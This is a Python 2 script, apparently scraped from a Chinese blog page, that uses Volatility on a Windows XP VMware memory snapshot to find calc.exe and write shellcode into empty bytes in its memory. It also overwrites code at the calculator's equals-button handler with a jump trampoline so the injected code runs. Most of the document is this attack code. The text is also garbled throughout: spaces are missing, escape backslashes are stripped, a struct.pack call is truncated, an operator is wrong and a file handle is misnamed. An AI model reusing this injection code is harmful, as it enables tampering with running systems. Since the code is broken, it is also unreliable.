#coding=utf-8
importsysimportstruct
equals_button= 0x01005D51memory_file= "WinXPenSP3-Snapshot8.vmem"slack_space=None
trampoline_offset=None#读入我们的shellcode
sc_fd = open("cmeasure.bin","rb")
sc=sc_fd.read()
sc_fd.close()
sys.path.append("C:\Python27\volatility-2.3.1")importvolatility.conf as confimportvolatility.registry as registry
registry.PluginImporter()
config=conf.ConfObject()importvolatility.commands as commandsimportvolatility.addrspace as addrspace
config.parse_options()
config.PROFILE= "WinXPSP3x86"config.LOCALTION= "file://%s"%memory_fileimportvolatility.plugins.taskmods as taskmods
p=taskmods.PSList(config)for process inp.calculate():if str(process.ImageFileName) == "calc.exe":print "[*] Found calc.exe with PID %d"%process.UniqueProcessIdprint "[*] Hunting for physical offsets...please wait."address_space=process.get_process_address_space()
pages=address_space.get_available_pages()for page inpages:
physical=address_space.vtop(page[0])if physical is notNone:if slack_space isNone:
fd= open(memory_file,"r+")
fd.seek(physical)
buf= fd.read(page[1])try:
offset= buf.index("x00"*len(sc))
slack_space= page[0] +offsetprint "[*] Found good shellcode location!"
print "[*] Virtual address: 0x%08x"%slack_spaceprint "[*] Physical address: 0x%08x"%(physical +offset)print "[*] Injecting shellcode."fd.seek(physical+offset)
fd.write(sc)
fd.close()#创建我们的跳转代码
tramp = "xbb%s"%struct.pack("
tramp+= "xffxe3"
if trampoline_offset is notNone:break
except:passfd.close()#查看目标代码的位置
if page[0] <= equals_button and equals_button < ((page[0] + page[1]) - 7):print "[*] Found our trampoline target at: 0x%08x"%(physical)#计算虚拟偏移
v_offset = equals_button =page[0]#计算物理偏移
trampoline_offset = physical +v_offsetprint "[*] Found our trampoline target at: 0x%08x"%(trampoline_offset)if slack_space is notNone:break
print "[*] Writing trampoline..."fd= open(memory_file,"r+")
fd.seek(trampoline_offset)
fd.write(tramp)
f.close()print "[*] Done injecting code."
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
